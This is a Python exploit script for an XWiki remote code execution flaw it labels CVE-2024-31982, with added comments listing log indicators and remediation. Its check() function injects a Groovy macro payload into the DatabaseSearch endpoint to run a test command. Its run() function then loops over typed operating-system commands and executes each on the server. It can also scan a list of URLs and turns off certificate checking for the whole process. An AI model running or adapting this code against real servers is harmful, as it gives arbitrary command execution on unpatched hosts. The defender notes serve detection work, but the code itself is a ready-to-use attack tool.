import requests
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import json
import re
# Process-wide TLS downgrade: swaps the stdlib's default HTTPS context factory
# for the unverified one (both are private `ssl` names), so any stdlib HTTPS
# client that uses that default stops validating certificates for the lifetime
# of the interpreter, not just for this script's own requests.
# NOTE(review): every requests call in this file already passes verify=False,
# so this global override looks redundant here; confirm before keeping it.
ssl._create_default_https_context = ssl._create_unverified_context
# Suppresses the InsecureRequestWarning that urllib3 would otherwise emit for
# each unverified request, so the operator gets no reminder that the peer is
# unauthenticated and that responses could come from an interposed host.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    """Return every line of *file_path* as a list of strings.

    Line terminators are removed. Nothing else is normalised: blank lines
    come back as empty strings and surrounding whitespace is kept.
    """
    with open(file_path, 'r') as handle:
        content = handle.read()
    return content.splitlines()
def check(url):
    """Probe *url* for the XWiki issue this script labels CVE-2024-31982.

    Sends one GET to ``/bin/get/Main/DatabaseSearch`` whose ``text`` parameter
    carries a URL-encoded ``{{async}}``/``{{groovy}}`` macro block. The Groovy
    snippet runs ``echo HelloWorldtest`` and throws the output as an
    exception, so the marker is expected to show up in the error text.

    Returns True (after printing a "Discovered" line) when the response is
    HTTP 200 and contains all three marker strings. In every other case,
    including any exception, it falls through and returns None, not False.

    Defender notes:
      * Access-log indicator: requests to ``/bin/get/Main/DatabaseSearch``
        whose ``text`` parameter contains ``{{groovy}}`` or ``{{async``
        (URL-encoded as ``%7B%7Bgroovy%7D%7D`` / ``%7B%7Basync``), together
        with the fixed Chrome/41 User-Agent string set below.
      * A non-match is inconclusive. Timeouts, connection errors and
        malformed URLs are swallowed and look the same as "not matched".
      * Remediation is upgrading XWiki to a release that fixes
        CVE-2024-31982. Fixed versions are not listed on this page, so take
        them from the vendor advisory.
    """
    url = url.rstrip("/")
    # The second argument is an absolute path, so urljoin() replaces any path
    # component already present in `url` rather than appending to it.
    target = urljoin(url, "/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27echo%20HelloWorldtest%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20")
    # Static, dated browser User-Agent; identical in check() and run(), which
    # makes it usable as a correlation field in web-server logs.
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    try:
        # verify=False: the server certificate is not validated, so the
        # response is not authenticated as coming from the intended host.
        response = requests.get(target, verify=False, headers=headers,timeout=15)
        # NOTE(review): 'HelloWorldtest' also appears verbatim in the request
        # URL, so a page that merely reflects the query would satisfy the
        # first marker; the 'Script' and 'org.xwiki' checks presumably guard
        # against that false positive. Confirm.
        if response.status_code == 200 and 'HelloWorldtest' in response.text and 'Script' in response.text and 'org.xwiki' in response.text:
                print(f"\033[31mDiscovered:{url}: Xwiki_CVE-2024-31982_RCE!\033[0m")
                return True
    except Exception as e:
        # Every failure is discarded without logging; `e` is never used.
        pass

def run(url):
    """Interactive follow-up to check() for a single *url*.

    Does nothing unless check(url) returns True. Otherwise it loops: read a
    line from stdin, URL-quote it, substitute it into the same
    DatabaseSearch/Groovy template that check() uses, send the result, and
    print the text captured from the ``Cause: [...]`` part of the response.
    The loop ends when the quoted input contains the substring "exit".
    Returns None.

    Defender notes:
      * Each line typed produces one more request to
        ``/bin/get/Main/DatabaseSearch`` with a ``{{groovy}}`` block in
        ``text``. These are sent with POST, whereas check() uses GET, so log
        searches should cover both methods.
      * The Groovy ``.execute()`` call in the template starts an operating
        system process on the server. Child processes spawned by the XWiki
        servlet container are therefore a host-level signal to review
        (presumed from the template, not shown by this file).
      * Server-side exception logs naming groovy and org.xwiki around the
        same timestamps are a likely corroborating artefact, since the
        script relies on those strings appearing in the error output.
    """
    url = url.rstrip("/")
    # Same fixed User-Agent as check(), so both phases correlate in logs.
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    if check(url):
        while True:
            command = input("\033[34mPlease input command (stop input:exit):\033[0m")
            command = quote(command)
            # str.replace() swaps every occurrence of the literal text
            # 'command' in the template; the template contains it once.
            command2="/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27command%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20".replace('command',command)
            # Absolute path: urljoin() replaces any path already in `url`.
            target = urljoin(url,command2)
            # Substring test on the quoted input, not an equality test: any
            # line that merely contains "exit" ends the loop without a request.
            if "exit" not in command:
                try:
                    # verify=False: the peer certificate is not validated.
                    response_sult = requests.post(target, verify=False, headers=headers,timeout=15)
                    if response_sult.status_code == 200 and 'groovy' in response_sult.text and 'Exception' in response_sult.text and 'org.xwiki' in response_sult.text:
                        # Non-greedy capture of the first bracketed group after
                        # "Cause:". '.' does not match newlines here, so only a
                        # match that fits on one line is captured.
                        pattern = r'Cause:\s*\[(.*?)\]'
                        match = re.search(pattern, response_sult.text)
                        if match:
                            extracted_content = match.group(1)
                            print(extracted_content)
                except Exception as e:
                    # Failures are dropped silently; the operator sees no
                    # output and the loop prompts again.
                    pass
            else:
                break

if __name__ == "__main__":
    # Command-line entry point.
    #   -u/--url : one base URL; runs check() and, on a match, the interactive
    #              loop in run().
    #   -f/--txt : a file of base URLs, one per line; only check() is run on
    #              each, so list mode never enters the interactive loop.
    # With neither option the script prints the literal word "help".
    cli = argparse.ArgumentParser()
    cli.add_argument("-u", "--url", help="URL")
    cli.add_argument("-f", "--txt", help="file")
    args = cli.parse_args()
    url, txt = args.url, args.txt
    if url:
        run(url)
    elif txt:
        for url in read_file(txt):
            check(url)
    else:
        print("help")